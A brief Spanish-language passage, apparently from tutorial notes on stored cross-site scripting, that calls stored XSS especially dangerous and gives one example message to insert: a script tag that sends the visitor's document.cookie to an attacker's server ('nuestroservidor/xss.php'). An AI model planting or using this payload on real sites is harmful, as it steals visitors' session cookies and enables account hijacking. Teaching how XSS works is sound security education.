En este apartado poco que decir. Este es más peligroso, ya que todo el que visita la pagina puede ser una victima del ataque ya que queda almacenado el codigo maligno
Para ver que más se puede hacer mirar el el XSS reflected
ejemplo de mensaje a insertar:
<script>new Image().src="http://nuestroservidor/xss.php?cookie="+escape(document.cookie);</script>